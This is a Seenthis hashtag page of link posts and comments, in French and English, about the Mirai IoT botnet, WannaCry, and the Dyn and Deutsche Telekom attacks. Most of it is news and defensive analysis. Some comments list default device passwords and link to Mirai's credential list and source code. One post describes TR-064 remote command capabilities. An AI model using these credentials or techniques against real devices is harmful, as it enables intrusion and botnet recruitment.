Seenthis
•
 
Identifiants personnels
  • [mot de passe oublié ?]

 
  • #m
  • #mi
  • #mir
  • #mira
RSS: #mirai

#mirai

  • #mirail
  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 27/07/2020
    9
    @arno
    @biggrizzly
    @jeanmarie
    @simplicissimus
    @7h36
    @grommeleur
    @02myseenthis01
    @alexcorp
    @sombre
    9

    « 5G : 6 arguments pour un moratoire stratégique »

    « Peut-on avoir un débat stratégique sur la #5G ou doit-on se contenter des a priori pour ou contre ? La partie est-elle déjà jouée ou les États européens et leurs citoyens peuvent-ils recouvrer leur souveraineté dans cette affaire ? 6 arguments devraient être débattus séparément et à égalité d’importance : la santé, l’environnement, la souveraineté, les territoires, l’utilité sociale, la sécurité. »

    ▻https://blogs.mediapart.fr/dominique-g-boullier/blog/160720/5g-6-arguments-pour-un-moratoire-strategique

    Stéphane Bortzmeyer @stephane CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 27/07/2020

      Plutôt moins de bêtises que dans beaucoup de textes sur le sujet, surtout si on compare avec tous les délires lus sur la 5G. C’est bien argumenté et je suis d’accord avec lui sur l’approche, mais…

      [Déjà, la section sur la santé… Pourquoi demander de telles précautions pour la 5G et pas pour toutes les autres innovations ?]

      Le troll contre « le porno, YouTube et Netflix » est vraiment trop facile. Outre le jugement de valeur un peu réac (la télé, c’est mal), cela ignore l’extrême variété des contenus sur YouTube (du génial au consternant).

      L’idée « Ne peut-on pas avoir en même temps une discussion sur les contenus qui doivent être favorisés ? » est très dangereuse. Cela mène aux violations de la neutralité, et cela ouvre une discussion sans fin sur « vaut-il mieux diffuser des matches de foot ou des cours de philo ? ».

      Et l’analyse de cybersécurité est tout à fait erronée. Les failles sur les sites Web menant à la fuite de données personnelles n’ont rien à voir avec la techno de connexion (5G ou pas).

      Mais, surtout, l’appel à renforcer la sécurité est ambigu : cela peut mener également à la demande d’un réseau « civilisé » (N. Sarkozy), contrôlé étroitement. Des phrases comme « il faut désormais reprendre le contrôle complet du réseau et revoir totalement les instances de régulation ad hoc d’internet » font peur.

      Au passage, l’analyse de l’attaque de #Mirai contre #Dyn (« le fournisseur d’adresses de tout le quart Nord Est des Etats-Unis », ah, ah) est vraiment faite avec les pieds et comprend plusieurs erreurs graves (ou simplifications exagérées, si on veut être gentil). #DNS

      Et je critique ici car je ne vois pas comment commenter un article sur les blogs de Mediapart.

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @vanderling
      Vanderling @vanderling 27/07/2020

      Le troll contre « le porno, YouTube et Netflix » est vraiment trop facile. Outre le jugement de valeur un peu réac (la télé, c’est mal), cela ignore l’extrême variété des contenus sur YouTube (du génial au consternant).

      ▻https://medium.com/@louisther37/comment-contourner-le-blocage-des-sites-pornographiques-ffb236c980da

      https://miro.medium.com/max/700/1*qcG9sjla5X0m-9kCGyd3Bg.jpeg

      #jackie&michel

      Vanderling @vanderling
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 13/05/2017
    3
    @biggrizzly
    @fredlm
    @simplicissimus
    3

    Warning: for Windows systems: important spread of #WannaCry (#Wcry) ransomware

    ▻http://thehackernews.com/2017/05/wannacry-ransomware-unlock.html?m=1
    ▻https://arstechnica.com/security/2017/05/an-nsa-derived-ransomware-worm-is-shutting-down-computers-worldwide

    The malware/worm is causing disruptions at banks, hospitals, telecommunications services, train stations, and other mission-critical organisations in multiple countries, including the UK, Spain, Germany, and Turkey. Telefonica, FedEx, and the UK government’s National Health Service (NHS) have been hit. Operations were cancelled, x-rays, test results and patient records became unavailable and phones did not work.

    The ransomware completely encrypts all your files and render them unusable. They ask you to pay some money to get the decryption key. ($300 to $600 worth in bitcoins). Paying does not guarantee you will get a decryption key though.

    The malware spreads through social engineering e-mails.
    Be careful with any attachments you receive from unknown sources (and even known sources). Make sure the files are sent intentionally.
    Watch out for .pdf or .hta files, or links received via e-mail that point to .pdf or .hta files.

    More than 45.000 computers worldwide have already been infected, but there appears to be a kill switch, i.e. a way to stop its spreading.
    As one of the first operations, the malware tries to connect to the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the program terminates.

    This can be seen as a kind of kill switch provision, or perhaps it had some particular reason. Whichever it is, the domain has now been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that runs the malware. This will of course not help anyone already infected.

    Microsoft has released a patch to block the malware on Windows machines:

    MS17-010
    ▻https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    It is important to apply the patch because other variants of the malware can exploit the same vulnerability and/or use a different domain name check.

    Nice technical analysis of the worm:

    ▻https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r

    And more technical info about the worm itself: (careful)

    ▻https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    typedef struct _wc_file_t {
    char     sig[WC_SIG_LEN]     // 64 bit signature WANACRY!
    uint32_t keylen;             // length of encrypted key
    uint8_t  key[WC_ENCKEY_LEN]; // AES key encrypted with RSA
    uint32_t unknown;            // usually 3 or 4, unknown
    uint64_t datalen;            // length of file before encryption, obtained from GetFileSizeEx
    uint8_t *data;               // Ciphertext Encrypted data using AES-128 in CBC mode
    } wc_file_t;
    

    #malware #worm #ransomware #NSA #Shadow_Broker #EternalBlue

    schrödinger @erratic
    • @erratic
      schrödinger @erratic 13/05/2017

      ici aussi : ►https://seenthis.net/messages/597948

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 13/05/2017

      En français :

      ▻http://www.leparisien.fr/high-tech/douze-pays-victimes-d-une-cyberattaque-massive-des-hopitaux-britanniques-
      ▻http://www.lemonde.fr/international/article/2017/05/13/une-cyberattaque-massive-bloque-des-ordinateurs-dans-des-dizaines-de-pays_51
      ►http://www.lalibre.be/dernieres-depeches/afp/une-attaque-informatique-massive-frappe-a-travers-le-monde-5916cbd3cd7002254

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 13/05/2017

      et pour les moins techniques :

      ▻http://www.leparisien.fr/high-tech/cyberattaque-massive-quelle-attitude-adopter-face-a-un-rancongiciel-13-05

      Les « rançongiciels » (« ransomware » en anglais) promettent de libérer vos données contre le paiement d’une rançon. Quelques conseils pour se prémunir contre ce type d’attaques ou y faire face.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 13/05/2017

      https://pbs.twimg.com/media/Cud5h2BWcAAq_X7.jpg

      schrödinger @erratic
    • @sandburg
      Sandburg @sandburg CC BY-SA 13/05/2017
      @erratic

      Internet des objets et les problèmes pas encore trop visibles :
      ▻https://seenthis.net/messages/598009

      @erratic as-tu un autre lien vers ce cartoon ?
      (Test) ce lien a l’air statique :

      http://www.geekculture.com/joyoftech/joyimages/2340.png

      Sandburg @sandburg CC BY-SA
    • @fredlm
      fred1m @fredlm PUBLIC DOMAIN 15/05/2017

      #zero_day

      fred1m @fredlm PUBLIC DOMAIN
    • @erratic
      schrödinger @erratic 16/05/2017

      As expected, new variants have arrived which no longer have the “kill swich” bypass.

      The amount of infected machines has reached 200.000 now.

      ▻https://www.cnet.com/news/wannacry-ransomware-patched-updated-virus-kill-switch
      ▻https://heimdalsecurity.com/blog/security-alert-uiwix-ransomware

      #Uiwix

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 16/05/2017

      A regularly updated page with lost of interesting info on the evolution of this WannaCry malware

      ▻https://www.wannacry.be

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 20/05/2017

      Hackers are trying to reignite WannaCry with botnet attacks

      As WannaCry went to sleep by registering a certain domain and putting a live web server on that IP (kill switch), hackers now try to bring down that web server so that the WannaCry infected machines would wake up again

      ▻https://www.wired.com/2017/05/wannacry-ransomware-ddos-attack

      #Mirai

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 20/05/2017

      Supposedly, it is possible to get decryption keys without paying the ransom - provided you didn’t reboot your windows machine.

      ▻http://www.ibtimes.co.uk/wannacry-how-decrypt-recover-your-data-infected-windows-systems-1622512

      IBTimes UK earlier reported how French cybersecurity researcher Adrien Guinet, from Quarkslab, released a decrypting tool that allowed only Windows XP users to recover their data. Guinet’s work was advanced by internationally acclaimed ethical hacker Benjamin Delpy who exploited the shortcomings of WannaCry and used it to create a tool called WanaKiwi that produces a decryption key for Windows XP, 7, 2003, 2008 and possibly Vista.

      French ethical hacker and co-founder of CloudVolumes, Matt Suiche confirmed that WanaKiwi has been tested and shown to work on Windows 7 and older Windows versions like XP, 2003 and more. Europe also tweeted confirming they were able to use the tool for decryption.

      How it works
      While WannaKey extracted prime numbers that had not been erased from the system and were vital to the decryption key, it required a separate app to transform those bits into the secret key. WanaKiwi scours the memory of the infected systems, extracts the p and q variables the secret key was based on, and reassembles the finished key all by itself. The tool then uses the key to decrypt all files locked by the WannaCry ransomware.

      The WanaKiwi decryption tool:

      ▻https://github.com/gentilkiwi/wanakiwi/releases/tag/0.1

      schrödinger @erratic
    Écrire un commentaire
  • @etraces
    e-traces @etraces ART LIBRE 12/05/2017

    Un logiciel malveillant vise 120.000 webcams et caméras de surveillance
    ▻http://www.lefigaro.fr/secteur/high-tech/2017/05/12/32001-20170512ARTFIG00124-un-logiciel-malveillant-vise-120000-webcams-et-ca

    Un nouveau type de logiciel malveillant a été repéré sur le Web. Inspiré de Mirai, le nouveau programme infecte des objets connectés et les place sous le contrôle de pirates. Les webcams sont des cibles de choix pour les pirates. La société de cybersécurité Trend Micro a découvert un nouveau type de logiciel malveillant sur Internet. Dans un rapport, elle affirme que 120.000 webcams et caméras de surveillance sont vulnérables et peuvent être enrôlées dans des réseaux de machines zombies. Aussi appelés (...)

    #Mirai #spyware #webcam #hacking

    e-traces @etraces ART LIBRE
    • @vanderling
      Vanderling @vanderling 12/05/2017

      Une autre histoire glauque de webcam

      La rançon de la honte : les chantages à la webcam se multiplient (avis aux amateurs de sexe en ligne…)
      Une nouvelle arnaque prend de l’ampleur sur le web : le
      #scam_sex. Le principe ? Se faire passer pour une jeune femme, flirter avec un internaute, le pousser à se masturber devant sa webcam... puis le menacer de diffuser la vidéo s’il ne paie pas une rançon.

      ▻http://www.atlantico.fr/decryptage/rancon-honte-chantages-webcam-se-multiplient-avis-aux-amateurs-sexe-en-ligne-scam-sex-franck-decloquement-2865327.html/page/0/1
      ▻http://www.bbc.com/news/uk-38150313
      #sextorsion #racket #suicide #branlette_2.0 #misère_sexuelle

      Vanderling @vanderling
    • @erratic
      schrödinger @erratic 13/05/2017

      #Persirai

      schrödinger @erratic
    Écrire un commentaire
  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 18/01/2017
    3
    @erratic
    @fil
    @0gust1
    3

    On connait désormais le nom de l’auteur du #malware #Mirai. Il a été reconnu par sa combinaison assez inhabituelle de compétences dont il s’était vanté, sur un forum sous un pseudo, et sur LinkedIn sous son vrai nom...

    ▻https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author

    #botnet #cyberdélinquance #vantardise

    • #LinkedIn
    Stéphane Bortzmeyer @stephane CC BY-SA
    • @erratic
      schrödinger @erratic 18/01/2017

      #DDoS

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 22/01/2017

      ▻https://techcrunch.com/2017/01/18/mirai-botnet-creator-unmasked-as-ddos-protection-developer-tempted-by-th

      But for those of you who just want to skip to the end, here’s the executive summary. Anna-senpai appears to be one of perhaps a dozen aliases for one Paras Jha, founder of DDOS protection service ProTraf. ProTraf was in fierce competition over the lucrative Minecraft server market, and seems to have resorted to underhanded tactics in order to drive customers away from other hosts.

      Several ProTraf employees — perhaps all of them, in fact — seem in various online conversations indirectly attributable to them to threaten, create, and execute DDOS attacks on competitors and for hire — $100 in bitcoin for every five minutes of attack time.

      Jha looks to have been undone by the compulsive need of hackers operating in the shadows to claim credit for their work. Various personas linked to Jha and his colleagues take responsibility for numerous attacks, the creation of the Mirai code, and extorting service providers worldwide.

      Slips here and there (identical coding skills between two online identities, for instance, or an attack utilising data only certain people could know) allowed the dots to be connected by Krebs, who understandably took the September takedown of his own site as something of a personal affront.

      https://tctechcrunch2011.files.wordpress.com/2017/01/miraiconnections.png

      schrödinger @erratic
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 29/11/2016

    Failed #Mirai botnet attack causes internet outage for 900,000 Germans

    ▻http://www.dw.com/en/deutsche-telekom-hack-part-of-global-internet-attack/a-36574934

    German security experts have suggested internet outages that have hit hundreds of thousands of Deutsche Telekom customers in Germany were part of a worldwide attempt to hijack routing devices.

    “The BSI considers this outage to be part of a worldwide attack on selected remote management interfaces of DSL routers,” the government agency said on its website.

    Deutsche Telekom said the issues seemed to be connected to an attempt to make a number of customers’ routers part of the Mirai botnet.

    Deutsche Telecom information page:

    ▻https://www.telekom.com/en/media/media-information/archive/information-on-current-problems-444862

    Deutsche Telekom has developed a software update together with the router manufacturers which is offered for download here ▻https://www.telekom.de/stoerung

    #DDoS
    #botnet

    • #Deutsche Telekom
    schrödinger @erratic
    • @erratic
      schrödinger @erratic 8/12/2016

      What was behind this Mirai variant is the exploitation of a #TR-064 protocol vulnerability (CPE WAN Management Protocol, or #CWMP)

      ▻https://www.incapsula.com/blog/new-variant-mirai-embeds-talktalk-home-routers.html

      TR-069 is a widely used protocol many ISPs employ to remotely manage network routers. Its communication occurs on port 7547, to which remote commands are sent. One such command is Time/SetNTPServers, used to synchronize a router with an external time source.

      However, this same command can also be modified to let hackers remotely execute bash commands. Among other things, this enables them to:

      • Open port 80 for remote access.
      • Obtain Wi-Fi passwords.
      • Modify the iptable rules.
      • Inject malware into the device.

      schrödinger @erratic
    Écrire un commentaire
  • @etraces
    e-traces @etraces ART LIBRE 29/11/2016

    L’Allemagne accuse la Russie de cyberattaques
    ▻http://www.lemonde.fr/europe/article/2016/11/29/l-allemagne-accuse-la-russie-de-cyberattaques_5040241_3214.html

    Berlin voit dans la multiplication de récents piratages informatiques la volonté de Moscou de perturber le jeu politique à moins d’un an des législatives allemandes A moins d’un an des élections législatives, l’Allemagne redoute une multiplication de piratages informatiques notamment en provenance de Russie pour perturber le jeu politique. « L’Europe est au centre de ces tentatives de déstabilisation et l’Allemagne tout particulièrement », a estimé, mardi 29 novembre, le directeur du renseignement (...)

    #Mirai #hacking #Deutsche_Telekom

    • #Allemagne
    e-traces @etraces ART LIBRE
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 9/11/2016
    1
    @fil
    1

    Researcher develops worm to fight Mirai botnet

    Researcher Scott Tenaglia found a stack buffer overflow vulnerability in the Mirai code which could be used to crash bots and shut down Mirai attacks.

    ▻http://www.theregister.co.uk/2016/10/28/mirai_botnet_hack_back

    Now, a GitHub user going by Leo Linsky has forked a repo created by researcher Jerry Gamblin to create an anti-worm “nematode” that could help to patch vulnerable devices used in the Mirai DDoS attacks. (the code is unfortunately no longer available)

    ▻http://www.theregister.co.uk/2016/10/31/this_antiworm_patch_bot_could_silence_epic_mirai_ddos_attack_army

    A Nematode is a controlled worm that can be used for beneficial purposes, such as self-healing networks.

    The worm goes further and can be used to break into woefully insecure internet-of-things devices and change the default Telnet credentials within.

    Doing so would lock Mirai and other malware users out of the devices, along with legitimate administrators.

    “This is a purely academic research project intended to show a proof of concept anti-worm worm, or nematode, for the types of vulnerabilities exploited by Mirai,” Linsky says.

    "The idea is to show that devices can be patched by a worm that deletes itself after changing the password to something device- specific or random.

    Unleashing the nematode would breach computer crime laws in the US, UK, and Australia, and likely in many other countries where unauthorised use and modification of computer equipment is an offense.

    More on Mirai

    ►https://seenthis.net/messages/531503

    #Mirai #DDoS #malware

    schrödinger @erratic
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 6/11/2016
    1
    @fil
    1

    a Mirai botnet perturbed Liberia’s internet connectivity

    Liberia is connected to internet via only one undersea cable (part of ACE - African Coast to Europe) of 5.12 Tbps, shared between all 23 countries connected via ACE.

    Mirai has been targeting IP addresses of Lonestarcell MTN, a telecom operators managing the Liberian ACE leg, flooding the pipe with 500 Gbps and thereby impacting Liberia’s internet several times. (well, the 6% of the country that actually has internet access).
    Lonestarcell MTN is one of the 4 telecom operators

    ▻http://thehackernews.com/2016/11/ddos-attack-mirai-liberia.html

    Many media, including BBC, PC World, The Guardian, Forbes, IBtimes, Quartz, Mashable, The Register, inaccurately reported that Liberia was totally cut off.

    https://upload.wikimedia.org/wikipedia/commons/d/d4/Cable_map18.svg

    ▻https://krebsonsecurity.com/2016/11/did-the-mirai-botnet-really-take-liberia-offline

    “Both our ACE submarine cable monitoring systems and servers hosted (locally) in LIXP (Liberia Internet Exchange Point) show no downtime in the last 3 weeks,” [the general manager of Cable Consortium of Liberia] said. “While it is likely that a local operator might have experienced a brief outage, we have no knowledge of a national Internet outage and there are no data to substantial that.”

    Mirai announces its attacks here:

    ▻https://twitter.com/MiraiAttacks

    #Mirai #DDoS #botnet
    #undersea_cable #câble_sous-marin

    • #Liberia
    schrödinger @erratic
    • @cdb_77
      CDB_77 @cdb_77 7/11/2016

      #Afrique #câbles_sous-marins #Internet

      CDB_77 @cdb_77
    • @erratic
      schrödinger @erratic 8/11/2016

      Liberian Observer:

      Lonestar Cell MTN has contracted Arbor’s DDoS mitigation service.

      ▻http://www.liberianobserver.com/news/hackers-attack-lonestar-mtn-network

      Lodestar Cell MTN is pleading to the Liberian authorities to take this issue seriously, because this threat could affect other financial institutions.

      The cellular network provider is calling on the government through its security apparatus to institute immediate investigation into the matter as these DDOS attacks amount to economic sabotage and calls on the LTA to ensure that Liberia urgently joins Africa CERT, an organization setup to protect countries around Africa against cyber threats.

      #Arbor

      schrödinger @erratic
    Écrire un commentaire
  • @mediapart
    Mediapart @mediapart 27/10/2016

    Les #objets_connectés s’attaquent à Internet
    ▻https://www.mediapart.fr/journal/international/271016/les-objets-connectes-s-attaquent-internet

    Depuis plusieurs semaines, des chercheurs alertent sur la propagation d’un #Malware, un programme informatique installé dans les objets connectés (caméras de surveillance, enregistreurs vidéo) afin d’en prendre le contrôle. Le week-end dernier, un réseau de machines infectées a lancé une attaque de grande envergure ayant mis hors ligne de nombreux sites tels que Twitter ou Spotify.

    #International #attaque_DDoS #Mirai #Numérique #sécurité_informatique

    Mediapart @mediapart
    Écrire un commentaire
  • @etraces
    e-traces @etraces ART LIBRE 26/10/2016

    La sécurité des objets connectés en question après une violente attaque informatique
    ▻http://www.lemonde.fr/pixels/article/2016/10/25/la-securite-des-objets-connectes-en-question-apres-une-violente-attaque-info

    Des centaines de milliers d’objets sont actuellement connectés et peuvent être utilisés pour lancer des attaques. On ne sait toujours pas qui a exécuté et commandité la puissante cyberattaque qui a paralysé une partie du Web, principalement aux Etats-Unis, vendredi 21 octobre. Des détails ont cependant émergé sur le mode opératoire : une partie du déluge de connexions qui ont mis à genou certains des plus importants sites au monde provenait d’un réseau d’objets connectés (...)

    #malware #Mirai #hacking

    e-traces @etraces ART LIBRE
    Écrire un commentaire
  • @etraces
    e-traces @etraces ART LIBRE 24/10/2016
    3
    @biggrizzly
    @colporteur
    @vanderling
    3

    Comment des caméras de surveillance ont rendu inaccessible une partie du web
    ▻http://www.numerama.com/tech/203367-comment-des-cameras-de-surveillance-ont-rendu-inaccessible-une-part

    Le PSN, Twitter, Netflix ou encore PayPal et eBay étaient inaccessibles depuis vendredi soir jusqu’à samedi dans la nuit. L’attaque contre Dyn a été orchestrée à partir d’objets connectés mal sécurisés, infectés par le malware Mirai. Terminator nous raconte l’histoire d’un soulèvement des machines qui, à grand renfort d’intelligence artificielle, de robots et de flingues, vient ravager l’Humanité. Cela fait un bon film d’action qui reste loin de notre quotidien. En 2016, l’attaque des objets connectés contre (...)

    #algorithme #CCTV #malware #hacking #Mirai

    • #eBay
    • #Twitter
    e-traces @etraces ART LIBRE
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 24/10/2016

    NewWorldHackers & Anonymous are behind the massive DDoS attack against Dyn DNS service, using the Mirai bonnet and other booters

    ▻http://securityaffairs.co/wordpress/52583/hacking/dyn-dns-service-ddos-3.html

    When I asked which Anon groups were involved they replied me that many crews targeted the Dyn DNS service.
    “Anonymous, Pretty much all of Anonymous” sais NewWorldHackers.
    They confirmed me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS Service was carried with the Mirai botnet alongside with other booters.

    #DDoS #botnet #Mirai
    #NewWorldHackers #Anonymous
    #Dyn #DNS
    #IoT

    • #Akamai
    • #DNS
    schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      Statement by Dyn

      ▻http://hub.dyn.com/static/hub.dyn.com/dyn-blog/dyn-statement-on-10-21-2016-ddos-attack.html

      We can confirm, with the help of analysis from Flashpoint and Akamai, that one source of the traffic for the attacks were devices infected by the Mirai bonnet. We observed 10s of millions of discrete IP addresses associated with the Mirai botnet that were part of the attack.

      #Flashpoint #Akamai

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      Krebs’s view on this

      ▻https://krebsonsecurity.com/2016/10/hacked-cameras-dvrs-powered-todays-massive-internet-outage

      “The issue with these particular devices is that a user cannot feasibly change this password,” Flashpoint’s Zach Wikholm told KrebsOnSecurity. “The password is hardcoded into the firmware, and the tools necessary to disable it are not present.

      #XiongMai

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      Rumours about extorsion

      ▻http://www.networkworld.com/article/3133751/security/extensive-ddos-attack-against-dyn-restarts-could-indicate-a-new-use-of

      Cunningham [director of cyber operations for A10 Networks] says he’s seen chatter on underground forums indicating that the attackers tried to extort Bitcoin from Dyn by threatening the attacks, and when the provider didn’t pay up, launched them. He says Dyn seems to be doing a pretty good job of mitigating the effects relatively quickly.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      Lengthy and interesting article by #Level3 on Mirai, containing information on the C2s (command & control servers) and the structure of the botnet

      ▻http://blog.level3.com/security/grinch-stole-iot

      By analyzing the communication patterns of the Mirai C2 IP addresses, we were able to identify and enumerate Mirai’s infrastructure. This analysis was later confirmed accurate when the Mirai source code was released.

      http://blog.level3.com/wp-content/uploads/2016/10/Figure-3-Mirai.jpg

      #gafgyt

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      The Mirai source code

      ▻https://github.com/jgamblin/Mirai-Source-Code

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 24/10/2016

      Chinese firm admits its hacked DVRs, cameras were behind [Dyn DNS] massive DDOS attack

      ▻http://www.pcworld.com/article/3134039/hacking/chinese-firm-admits-its-hacked-products-were-behind-fridays-massive-ddos-at

      Hangzhou Xiongmai Technology, a vendor behind DVRs and internet-connected cameras, said on Sunday that security vulnerabilities involving weak default passwords in its products were partly to blame.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 9/11/2016

      DDos On Dyn Used Malicious TCP, UDP Traffic

      ▻http://www.darkreading.com/attacks-breaches/ddos-on-dyn-used-malicious-tcp-udp-traffic-/d/d-id/1327309

      Scott Hilton, executive vice president of product for Dyn, in a blog post said the attackers employed masked TCP and UDP traffic via Port 53 in the attack as well as recursive DNS retry traffic, “further exacerbating its impact,” he said.

      [...]

      He noted that the DNS traffic sent in the DDoS attacks also generated legitimate DDoS retry traffic, making the attack more complicated to parse, and the attack generated ten- to 20 times the normal DNS traffic levels thanks to malicious and legit retries.

      “During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic,” he said in the post. “When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume. We saw both attack and legitimate traffic coming from millions of IPs across all geographies.”

      schrödinger @erratic
    Écrire un commentaire
  • @erratic
    schrödinger @erratic 8/10/2016
    2
    @fil
    @biggrizzly
    2

    More on Mirai, and more than Mirai

    ▻http://www.securityweek.com/mirai-iot-botnet-not-only-contributor-massive-ddos-attack-akamai

    Akamai says Mirai was not alone:

    While Akamai confirmed that the Mirai botnet was part the attack, the company also said that Mirai was only “a major participant in the attack” and that at least one other botnet might have been involved, though they couldn’t confirm that the attacks were coordinated.

    Akamai refers to Mirai as Kaiten and has it documented here:
    ▻https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf

    More on the released source code of Mirai which confirms the use of GRE flooding, one of the techniques used on top of DNS Water Torture:

    ▻http://www.securityweek.com/hacker-releases-source-code-iot-malware-mirai

    A copy of the source code files provided to SecurityWeek includes a “read” where the author of Mirai explains his reasons for leaking the code and provides detailed instructions on how to set up a botnet.

    [...]

    Mirai, believed to have made rounds since May 2016, infects IoT devices protected by weak or default credentials. Once it hijacks a device, the threat abuses it to launch various types of DDoS attacks, including less common UDP floods via Generic Routing Encapsulation (GRE) traffic.

    This was proven through reverse-engineering by
    ▻http://cyberx-labs.com/en/blog/cyberx-reveals-gre-evidence-krebs-iot-based-attack-largest-ddos-interne

    It is still GRE is still an uncommon attack vector, but it was already used during the 2016 Rio games
    ▻http://www.tripwire.com/state-of-security/security-data-protection/cyber-security/how-a-massive-540-gbsec-ddos-attack-failed-to-spoil-the-rio-olympics

    For some French, see also here:
    ▻https://seenthis.net/messages/530903

    #Mirai #Kaiten
    #Akamai
    #DDoS
    #Brian_Krebs
    #OVH
    #GRE
    #DNS_Water_Torture

    • #Akamai
    schrödinger @erratic
    • @erratic
      schrödinger @erratic 8/10/2016

      What cameras, IoT and DVR devices are taking part of Mirai ?

      https://krebsonsecurity.com/wp-content/uploads/2016/10/iotbadpass-pdf.png

      from Krebs:

      ▻https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 8/10/2016

      ▻http://www.forbes.com/sites/thomasbrewster/2016/10/07/chinese-firm-xm-blamed-for-epic-ddos-attacks/#5b59fcd33bf5

      But one researcher, Flashpoint’s Zachary Wikholm, today claimed to have found a single Chinese firm, Hangzhou XiongMai Technologies (XM), that shipped flawed code allowing the perpetrators to potentially amass nearly half a million bots for their malicious network.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 8/10/2016

      Interesting article by F5 which goes in a bit more detail about the two types of GRE flood attacks (Ethernet and IP based)

      ▻https://f5.com/about-us/news/articles/mirai-the-iot-bot-that-took-down-krebs-and-launched-a-tbps-ddos-attack-on-ovh-21

      They also make a reference to the origin of the Mirai name:

      It seems that the bot creator named his creation after a Japanese series “Mirai Nikki (The Future Diary)” and uses the nickname of “Anna-senpai” referring to the “Shimoneta” series.

      ▻https://f5.com/Portals/1/Images/News/blogs/mirai-inspiration.JPG

      schrödinger @erratic
    • @sandburg
      Sandburg @sandburg CC BY-SA 8/10/2016

      Default password for most popular devices.
      www.phenoelit.org/dpl/dpl.html

      admin 123456
      admin password
      Cisco Cisco
      login password
      root password
      …
      Le plus drole :
      Administrator changeme

      Sandburg @sandburg CC BY-SA
    • @erratic
      schrödinger @erratic 8/10/2016

      Here are the 61 passwords that powered the Mirai IoT botnet
      ▻http://www.csoonline.com/article/3126924/security/here-are-the-61-passwords-that-powered-the-mirai-iot-botnet.html

      http://images.techhive.com/images/article/2016/10/mirai_botnet_passwords-100685646-orig.jpg

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 14/10/2016

      Some more information on its spread, operations, and code, by Incapsulate.

      ▻https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

      One of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans.

      This list is interesting, as it offers a glimpse into the psyche of the code’s authors. On the one hand, it exposes concerns of drawing attention to their activities. A concern we find ironic, considering that this malware was eventually used in one of the most high-profile attacks to date.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 15/10/2016

      US CERT Threat Alert : Heightened DDoS Threat Posed by Mirai and Other Botnets
      ▻https://www.us-cert.gov/ncas/alerts/TA16-288A

      schrödinger @erratic
    • @sandburg
      Sandburg @sandburg CC BY-SA 16/10/2016

      ▻http://www.defaultpassword.com/?action=dpl

      Sandburg @sandburg CC BY-SA
    • @erratic
      schrödinger @erratic 30/10/2016

      ▻http://www.securityweek.com/whats-fix-iot-ddos-attacks

      HTTP GET floods were already pernicious. For years, attackers have been able to disable web sites by sending a flood of HTTP requests for large objects or slow database queries. Typically, these requests flow right through a standard firewall because hey, they look just like normal HTTP requests to most devices with hardware packet processing. The Mirai attack code takes it a step further by fingerprinting cloud-based DDoS scrubbers and then working around some of their HTTP DDoS mitigation techniques (such as redirection).

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 19/11/2016

      Mirai botnet leverages #STOMP Protocol to power DDoS attacks.

      ▻http://securityaffairs.co/wordpress/53544/malware/mirai-botnet-stomp.html

      STOMP is a simple application layer, text-based protocol [an alternative to other open messaging protocols, such as AMQP (Advanced Message Queuing Protocol] that allows clients communicate with other message brokers. It implements a communication method among for applications developed using different programming languages.

      [...]

      Below the steps of the DDoS STOMP attack:

      • A botnet device uses STOMP to open an authenticated TCP handshake with a targeted application.
      • Once authenticated, junk data disguised as a STOMP TCP request is sent to the target.
      • The flood of fake STOMP requests leads to network saturation.
      • If the target is programmed to parse STOMP requests, the attack may also exhaust server resources. Even if the system drops the junk packets, resources are still used to determine if the message is corrupted.

      How Mirai Uses STOMP Protocol to Launch DDoS Attacks

      ▻https://www.incapsula.com/blog/mirai-stomp-protocol-ddos.html

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 29/11/2016

      Mirai botnet with 400.000 devices now for rent

      ▻http://www.ibtimes.co.uk/ddos-hire-service-now-advertising-renting-out-400000-bot-strong-mirai-bot

      A DDoS-for-hire service, run by two hackers going by the pseudonyms Popopret and BestBuy, is now reportedly advertising a Mirai botnet up for rent. The Mirai botnet allegedly comprises of over 400,000 infected bots and may have been sired from the original Mirai source code.

      [...]

